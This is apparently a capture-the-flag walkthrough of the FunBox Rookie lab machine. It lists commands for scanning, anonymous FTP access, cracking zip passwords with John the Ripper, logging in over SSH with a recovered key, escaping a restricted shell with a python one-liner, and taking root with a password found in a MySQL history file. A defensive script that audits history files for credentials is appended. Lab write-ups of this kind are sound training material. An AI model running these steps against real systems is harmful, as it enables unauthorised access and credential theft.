FunBox Rookie
RECON
Ip Search
Apache Server
Nmap Scan
nmap -sC -sV 192.168.52.107
-sC: default scripts, -sV: service version detection
Anonymous FTP Login available, various visible zip files
ENUMERATION
ftp 192.168.52.107
Name: anonymous
Password: anonymous@domain.com
Grab zip Files
mget homer.zip john.zip tom.zip
Inspect File
Password locked id_rsa keys
Convert zip to a hash for password cracking
zip2john homer.zip > homer.hash
Install word list
rockyou.txt
Organize files into one directory
John the Ripper
john --wordlist=$rockyou tom.hash
Extract tom.zip
iubire
Id_rsa key
PRIVILEGE ESCALATION
SSH
ssh -i id_rsa tom@192.168.52.107
Success: logged in as tom
Flag
cat local.txt
Restricted Shell
Checking Sudo Privileges
Tom can run all commands; definitely worth pursuing
Remove Shell Restrictions
python3 -c 'import os; os.system("/bin/bash");'
Check for hidden files
ls -la
Reading mysql_history
cat .mysql_history
Reveals password
ROOT ESCALATION
Root Flag
sudo su
xx11yy22!
cat proof.txt
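Defensive check for the .mysql_history finding above, added here as an example and not part of the original write-up: it scans history text for statements likely to hold cleartext credentials and reports only line numbers and rule names. The sample history, rule names and regexes are constructed assumptions, and the `_HiStOrY_V2_` header and `\040` escapes assume a mysql client built against libedit.

```python
import re

# Constructed sample of a libedit-style history file (not taken from the target).
SAMPLE = "\n".join([
    "_HiStOrY_V2_",
    r"show\040databases;",
    r"create\040user\040'app'@'localhost'\040identified\040by\040'EXAMPLE-ONLY';",
    r"select\040*\040from\040users;",
    r"insert\040into\040users\040(name,\040password)\040values\040('app',\040'EXAMPLE-ONLY');",
])

# Hypothetical rule set: name -> pattern for statements that tend to hold secrets.
RULES = {
    "account-statement": re.compile(r"\b(identified\s+by|set\s+password)\b", re.I),
    "password-function": re.compile(r"\bpassword\s*\(", re.I),
    "credential-data": re.compile(
        r"\b(insert\s+into|update)\b.*\b(pass(word|wd)?|secret|token)\b", re.I),
}

def decode_history_line(line):
    """Turn octal escapes such as \\040 back into the characters typed."""
    return re.sub(r"\\([0-7]{3})", lambda m: chr(int(m.group(1), 8)), line)

def audit_history(text):
    """Return (line_number, rule_name) per risky statement, never the secret."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        if raw.startswith("_HiStOrY_V2_"):  # file header, not a statement
            continue
        stmt = decode_history_line(raw)
        for name, pattern in RULES.items():
            if pattern.search(stmt):
                findings.append((lineno, name))
                break  # one finding per line is enough for triage
    return findings

if __name__ == "__main__":
    for lineno, rule in audit_history(SAMPLE):
        print(f"line {lineno}: {rule}")
```

Setting MYSQL_HISTFILE=/dev/null for the account stops the client from writing the history file at all.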